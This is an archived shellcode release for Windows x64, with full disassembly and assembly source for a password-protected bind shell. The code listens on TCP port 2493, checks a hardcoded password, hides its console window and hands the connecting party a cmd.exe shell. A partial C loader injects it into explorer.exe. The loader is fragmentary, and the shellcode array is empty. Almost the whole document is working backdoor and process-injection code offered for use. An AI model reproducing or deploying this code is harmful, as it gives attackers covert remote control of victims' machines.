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Windows x64 Password Protected Bind Shellcode

Windows x64 Password Protected Bind Shellcode
Posted Jan 1, 2017
Authored by Roziul Hasan Khan Shifat

825 bytes small Windows x64 password protected bind shellcode.

tags | shellcode
systems | windows
SHA-256 | c0bbde3d6720685937eb70dde42897b287b93969c476d0a911b6923f9aa9db89

Windows x64 Password Protected Bind Shellcode

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# Title : Windows x64 Password Protected Bind Shell TCP shellcode
# size : 825 bytes
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 7 x64 professional
# Date : 01-01-2017



file format pe-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
0: 99 cltd
1: b2 80 mov $0x80,%dl
3: 48 29 d4 sub %rdx,%rsp
6: 4c 8d 24 24 lea (%rsp),%r12
a: 48 31 d2 xor %rdx,%rdx
d: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
12: 48 8b 40 18 mov 0x18(%rax),%rax
16: 48 8b 70 10 mov 0x10(%rax),%rsi
1a: 48 ad lods %ds:(%rsi),%rax
1c: 48 8b 30 mov (%rax),%rsi
1f: 48 8b 7e 30 mov 0x30(%rsi),%rdi
23: b2 88 mov $0x88,%dl
25: 8b 5f 3c mov 0x3c(%rdi),%ebx
28: 48 01 fb add %rdi,%rbx
2b: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
2e: 48 01 fb add %rdi,%rbx
31: 8b 73 1c mov 0x1c(%rbx),%esi
34: 48 01 fe add %rdi,%rsi
37: 48 31 d2 xor %rdx,%rdx
3a: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)
41: 5f
42: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
49: 32
4a: 41 88 54 24 06 mov %dl,0x6(%r12)
4f: 66 ba 40 03 mov $0x340,%dx
53: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
56: 48 01 fb add %rdi,%rbx
59: 49 8d 0c 24 lea (%r12),%rcx
5d: ff d3 callq *%rbx
5f: 49 89 c7 mov %rax,%r15
62: 48 31 d2 xor %rdx,%rdx
65: b2 88 mov $0x88,%dl
67: 41 8b 5f 3c mov 0x3c(%r15),%ebx
6b: 4c 01 fb add %r15,%rbx
6e: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
71: 4c 01 fb add %r15,%rbx
74: 44 8b 73 1c mov 0x1c(%rbx),%r14d
78: 4d 01 fe add %r15,%r14
7b: 66 ba c8 01 mov $0x1c8,%dx
7f: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
83: 4c 01 fb add %r15,%rbx
86: 48 31 c9 xor %rcx,%rcx
89: 66 b9 98 01 mov $0x198,%cx
8d: 48 29 cc sub %rcx,%rsp
90: 48 8d 14 24 lea (%rsp),%rdx
94: 66 b9 02 02 mov $0x202,%cx
98: ff d3 callq *%rbx
9a: 48 83 ec 58 sub $0x58,%rsp
9e: 48 83 ec 58 sub $0x58,%rsp
a2: 48 31 d2 xor %rdx,%rdx
a5: 66 ba 88 01 mov $0x188,%dx
a9: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
ad: 4c 01 fb add %r15,%rbx
b0: 6a 06 pushq $0x6
b2: 6a 01 pushq $0x1
b4: 6a 02 pushq $0x2
b6: 59 pop %rcx
b7: 5a pop %rdx
b8: 41 58 pop %r8
ba: 4d 31 c9 xor %r9,%r9
bd: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
c2: 4c 89 4c 24 28 mov %r9,0x28(%rsp)
c7: ff d3 callq *%rbx
c9: 49 89 c5 mov %rax,%r13
cc: 41 8b 5e 04 mov 0x4(%r14),%ebx
d0: 4c 01 fb add %r15,%rbx
d3: 6a 10 pushq $0x10
d5: 41 58 pop %r8
d7: 48 31 d2 xor %rdx,%rdx
da: 49 89 14 24 mov %rdx,(%r12)
de: 49 89 54 24 08 mov %rdx,0x8(%r12)
e3: 41 c6 04 24 02 movb $0x2,(%r12)
e8: 66 41 c7 44 24 02 09 movw $0xbd09,0x2(%r12)
ef: bd
f0: 49 8d 14 24 lea (%r12),%rdx
f4: 4c 89 e9 mov %r13,%rcx
f7: ff d3 callq *%rbx
f9: 41 8b 5e 30 mov 0x30(%r14),%ebx
fd: 4c 01 fb add %r15,%rbx
100: 6a 01 pushq $0x1
102: 5a pop %rdx
103: 4c 89 e9 mov %r13,%rcx
106: ff d3 callq *%rbx
108: 48 83 ec 58 sub $0x58,%rsp
10c: eb 12 jmp 120 <a>

000000000000010e <kick>:
10e: 48 83 c4 58 add $0x58,%rsp
112: 41 8b 5e 08 mov 0x8(%r14),%ebx
116: 4c 01 fb add %r15,%rbx
119: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx
11e: ff d3 callq *%rbx

0000000000000120 <a>:
120: 41 8b 1e mov (%r14),%ebx
123: 4c 01 fb add %r15,%rbx
126: 48 31 d2 xor %rdx,%rdx
129: 49 89 14 24 mov %rdx,(%r12)
12d: 49 89 54 24 08 mov %rdx,0x8(%r12)
132: b2 10 mov $0x10,%dl
134: 52 push %rdx
135: 4c 8d 04 24 lea (%rsp),%r8
139: 49 8d 14 24 lea (%r12),%rdx
13d: 4c 89 e9 mov %r13,%rcx
140: ff d3 callq *%rbx
142: 49 89 44 24 f8 mov %rax,-0x8(%r12)
147: 41 8b 5e 48 mov 0x48(%r14),%ebx
14b: 4c 01 fb add %r15,%rbx
14e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx
153: 41 c7 04 24 2d 2d 3e movl $0x203e2d2d,(%r12)
15a: 20
15b: 49 8d 14 24 lea (%r12),%rdx
15f: 6a 04 pushq $0x4
161: 41 58 pop %r8
163: 4d 31 c9 xor %r9,%r9
166: 48 83 ec 58 sub $0x58,%rsp
16a: ff d3 callq *%rbx
16c: 41 8b 5e 3c mov 0x3c(%r14),%ebx
170: 4c 01 fb add %r15,%rbx
173: 4d 31 c9 xor %r9,%r9
176: 6a 08 pushq $0x8
178: 41 58 pop %r8
17a: 49 8d 14 24 lea (%r12),%rdx
17e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx
183: ff d3 callq *%rbx
185: 41 81 3c 24 68 32 37 cmpl $0x31373268,(%r12)
18c: 31
18d: 0f 85 7b ff ff ff jne 10e <kick>
193: 41 81 7c 24 04 35 30 cmpl $0x46383035,0x4(%r12)
19a: 38 46
19c: 0f 85 6c ff ff ff jne 10e <kick>
1a2: 8b 5e 44 mov 0x44(%rsi),%ebx
1a5: 48 01 fb add %rdi,%rbx
1a8: ff d3 callq *%rbx
1aa: 48 31 d2 xor %rdx,%rdx
1ad: 41 c7 04 24 75 73 65 movl $0x72657375,(%r12)
1b4: 72
1b5: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
1bc: 32
1bd: 41 88 54 24 06 mov %dl,0x6(%r12)
1c2: 49 8d 0c 24 lea (%r12),%rcx
1c6: 48 83 ec 58 sub $0x58,%rsp
1ca: 66 ba 40 03 mov $0x340,%dx
1ce: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1d1: 48 01 fb add %rdi,%rbx
1d4: ff d3 callq *%rbx
1d6: 49 89 c6 mov %rax,%r14
1d9: 41 c7 04 24 46 69 6e movl $0x646e6946,(%r12)
1e0: 64
1e1: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12)
1e8: 6e 64
1ea: 41 c7 44 24 08 6f 77 movl $0x4141776f,0x8(%r12)
1f1: 41 41
1f3: 41 80 74 24 0b 41 xorb $0x41,0xb(%r12)
1f9: 48 31 d2 xor %rdx,%rdx
1fc: 66 ba 2c 09 mov $0x92c,%dx
200: 44 8b 2c 16 mov (%rsi,%rdx,1),%r13d
204: 49 01 fd add %rdi,%r13
207: 49 8d 14 24 lea (%r12),%rdx
20b: 4c 89 f1 mov %r14,%rcx
20e: 41 ff d5 callq *%r13
211: 48 31 d2 xor %rdx,%rdx
214: 41 c7 04 24 43 6f 6e movl $0x736e6f43,(%r12)
21b: 73
21c: 41 c7 44 24 04 6f 6c movl $0x57656c6f,0x4(%r12)
223: 65 57
225: 41 c7 44 24 08 69 6e movl $0x6f646e69,0x8(%r12)
22c: 64 6f
22e: 41 c7 44 24 0c 77 43 movl $0x616c4377,0xc(%r12)
235: 6c 61
237: 66 41 c7 44 24 10 73 movw $0x7373,0x10(%r12)
23e: 73
23f: 41 88 54 24 12 mov %dl,0x12(%r12)
244: 49 8d 0c 24 lea (%r12),%rcx
248: 48 83 ec 58 sub $0x58,%rsp
24c: ff d0 callq *%rax
24e: 48 31 d2 xor %rdx,%rdx
251: 41 c7 04 24 53 68 6f movl $0x776f6853,(%r12)
258: 77
259: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12)
260: 6e 64
262: 66 41 c7 44 24 08 6f movw $0x776f,0x8(%r12)
269: 77
26a: 41 88 54 24 0a mov %dl,0xa(%r12)
26f: 49 8d 14 24 lea (%r12),%rdx
273: 4c 89 f1 mov %r14,%rcx
276: 41 55 push %r13
278: 5b pop %rbx
279: 49 89 c5 mov %rax,%r13
27c: ff d3 callq *%rbx
27e: 4c 89 e9 mov %r13,%rcx
281: 48 31 d2 xor %rdx,%rdx
284: ff d0 callq *%rax
286: 4d 31 c0 xor %r8,%r8
289: 41 50 push %r8
28b: 5a pop %rdx
28c: 66 ba 1f 04 mov $0x41f,%dx
290: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
293: 48 01 fb add %rdi,%rbx
296: 41 50 push %r8
298: 5a pop %rdx
299: b2 80 mov $0x80,%dl
29b: 49 8d 0c 24 lea (%r12),%rcx
29f: ff d3 callq *%rbx
2a1: 48 31 d2 xor %rdx,%rdx
2a4: 41 c7 44 24 f4 63 6d movl $0x41646d63,-0xc(%r12)
2ab: 64 41
2ad: 41 88 54 24 f7 mov %dl,-0x9(%r12)
2b2: b2 68 mov $0x68,%dl
2b4: 49 89 14 24 mov %rdx,(%r12)
2b8: b2 ff mov $0xff,%dl
2ba: 48 ff c2 inc %rdx
2bd: 49 8b 44 24 f8 mov -0x8(%r12),%rax
2c2: 41 89 54 24 3c mov %edx,0x3c(%r12)
2c7: 49 89 44 24 50 mov %rax,0x50(%r12)
2cc: 49 89 44 24 58 mov %rax,0x58(%r12)
2d1: 49 89 44 24 60 mov %rax,0x60(%r12)
2d6: 48 83 ec 58 sub $0x58,%rsp
2da: 48 31 c9 xor %rcx,%rcx
2dd: 4d 31 c9 xor %r9,%r9
2e0: 6a 01 pushq $0x1
2e2: 41 58 pop %r8
2e4: 4c 89 44 24 20 mov %r8,0x20(%rsp)
2e9: 48 89 4c 24 28 mov %rcx,0x28(%rsp)
2ee: 48 89 4c 24 30 mov %rcx,0x30(%rsp)
2f3: 48 89 4c 24 38 mov %rcx,0x38(%rsp)
2f8: 49 8d 14 24 lea (%r12),%rdx
2fc: 48 89 54 24 40 mov %rdx,0x40(%rsp)
301: 49 8d 54 24 68 lea 0x68(%r12),%rdx
306: 48 89 54 24 48 mov %rdx,0x48(%rsp)
30b: 4d 31 c0 xor %r8,%r8
30e: 49 8d 54 24 f4 lea -0xc(%r12),%rdx
313: 4d 31 d2 xor %r10,%r10
316: 66 41 ba 94 02 mov $0x294,%r10w
31b: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
31f: 48 01 fb add %rdi,%rbx
322: ff d3 callq *%rbx
324: 48 31 d2 xor %rdx,%rdx
327: 52 push %rdx
328: 66 ba 29 01 mov $0x129,%dx
32c: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
32f: 48 01 fb add %rdi,%rbx
332: 59 pop %rcx
333: 48 83 c4 58 add $0x58,%rsp
337: ff d3 callq *%rbx



section .text
global _start

mov dl, 128

sub rsp,rdx
lea r12,[rsp]

xor rdx,rdx

mov rax,[gs:rdx+0x60]
mov rax,[rax+0x18]
mov rsi,[rax+0x10]
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address


mov dl,0x88
mov ebx,[rdi+0x3c]
add rbx,rdi
mov ebx,[rbx+rdx]
add rbx,rdi

mov esi,[rbx+0x1c] ;kernel32.dll AddressOfFunctions
add rsi,rdi

;=============================================MAIN CODE====================================================;

;loading ws2_32.dll

xor rdx,rdx

mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl

mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,rdi

lea rcx,[r12]
call rbx

mov r15,rax ;ws2_32.dll base Address
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]
add rbx,r15
mov ebx,[rbx+rdx]
add rbx,r15

mov r14d,[rbx+0x1c]
add r14,r15 ;ws2_32.dll AddressOfFunctions


mov dx,114*4
mov ebx,[r14+rdx]
add rbx,r15

xor rcx,rcx
mov cx,408

sub rsp,rcx
lea rdx,[rsp]
mov cx,514

call rbx

sub rsp,88
sub rsp,88
xor rdx,rdx
mov dx,98*4
mov ebx,[r14+rdx]
add rbx,r15

push 6
push 1
push 2

pop rcx
pop rdx
pop r8

xor r9,r9

mov [rsp+32],r9
mov [rsp+40],r9

call rbx

mov r13,rax ;SOCKET
mov ebx,[r14+4]
add rbx,r15 ;bind()

;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)

push 16
pop r8

xor rdx,rdx

mov [r12],rdx
mov [r12+8],rdx

mov [r12],byte 2
mov [r12+2],word 0xbd09 ;port 2493 (change it if U want)
lea rdx,[r12]

mov rcx,r13

call rbx

mov ebx,[r14+48]
add rbx,r15 ;listen()


push 1
pop rdx

mov rcx,r13
call rbx

sub rsp,88

jmp a
add rsp,88

mov ebx,[r14+8]
add rbx,r15 ;CloseSocket()

mov rcx,[r12-8]

call rbx


mov ebx,[r14]
add rbx,r15 ;accept()

;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)

xor rdx,rdx

mov [r12],rdx
mov [r12+8],rdx

mov dl,16
push rdx

lea r8,[rsp]

lea rdx,[r12]

mov rcx,r13

call rbx

mov [r12-8],rax ;client socket
mov ebx,[r14+72]
add rbx,r15 ;send()

mov rcx,[r12-8]
mov [r12],dword 0x203e2d2d
lea rdx,[r12]

push byte 4
pop r8

xor r9,r9
sub rsp,88
call rbx


mov ebx,[r14+60]
add rbx,r15 ;recv()

xor r9,r9
push byte 8
pop r8
lea rdx,[r12]
mov rcx,[r12-8]
call rbx

;password: h271508F

cmp dword [r12],'h271'
jne kick
cmp dword [r12+4],'508F'
jne kick

;hiding window

mov ebx,[rsi+68]
add rbx,rdi

call rbx ;AllocConsole()

xor rdx,rdx

;loading user32.dll
mov [r12],dword 'user'
mov [r12+4],word '32'
mov [r12+6],byte dl

lea rcx,[r12]

sub rsp,88 ;reserving memory for API

mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,rdi

call rbx ;LoadLibraryA("user32")

mov r14,rax ;user32.dll base

;Finding address of FindWindowA()
mov [r12],dword 'Find'
mov [r12+4],dword 'Wind'
mov [r12+8],dword 'owAA'
xor byte [r12+11],0x41

xor rdx,rdx
mov dx,587*4
mov r13d,[rsi+rdx]
add r13,rdi ;GetProcAddress() (temporary)

lea rdx,[r12]
mov rcx,r14

call r13


xor rdx,rdx

mov [r12],dword 'Cons'
mov [r12+4],dword 'oleW'
mov [r12+8],dword 'indo'
mov [r12+12],dword 'wCla'
mov [r12+16],word 'ss'
mov [r12+18],byte dl

lea rcx,[r12]
sub rsp,88
call rax


xor rdx,rdx

;finding Address of ShowWindow()
mov [r12],dword 'Show'
mov [r12+4],dword 'Wind'
mov [r12+8],word 'ow'
mov [r12+10],byte dl

lea rdx,[r12]
mov rcx,r14

push r13
pop rbx

mov r13,rax ;HWND

call rbx

mov rcx,r13
xor rdx,rdx

call rax

xor r8,r8
push r8
pop rdx

mov dx,1055
mov ebx,[rsi+rdx*4]
add rbx,rdi

push r8
pop rdx

mov dl,128

lea rcx,[r12]

call rbx


xor rdx,rdx

mov [r12-12],dword 'cmdA'
mov [r12-9],byte dl

mov dl,104

mov [r12],rdx
mov dl,255
inc rdx

mov rax,[r12-8]

mov [r12+0x3c],edx

mov [r12+0x50],rax
mov [r12+0x58],rax
mov [r12+0x60],rax


sub rsp,88

xor rcx,rcx
xor r9,r9

push 1
pop r8

mov [rsp+32],r8
mov [rsp+40],rcx
mov [rsp+48],rcx
mov [rsp+56],rcx

lea rdx,[r12]
mov [rsp+64],rdx
lea rdx,[r12+104]
mov [rsp+72],rdx

xor r8,r8
lea rdx,[r12-12]

xor r10,r10
mov r10w,165*4
mov ebx,[rsi+r10]
add rbx,rdi ;CreateProcessA()

call rbx



xor rdx,rdx
push rdx

mov dx,297
mov ebx,[rsi+rdx*4]
add rbx,rdi

pop rcx
add rsp,88
call rbx



char shellcode[]=\


int main()
HANDLE s,proc;
BOOL process_found=0;
LPVOID shell;
SIZE_T total;

//finding explorer.exe pid



printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError());
return -1;

printf("Process32First() failed.Error code %d\n",GetLastError());
return -1;


printf("Unknown Process\n");
return -1;

//opening process using pid


printf("OpenProcess() failed.Error code %d\n",GetLastError());
return -1;

//allocating memory process memory

if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)
printf("Failed to allocate memory into process");
return -1;

//writing shellcode into process memory


printf("Failed write shellcode into process memory");
return -1;

//Executing shellcode

printf("Failed to Execute shellcode");
return -1;


return 0;


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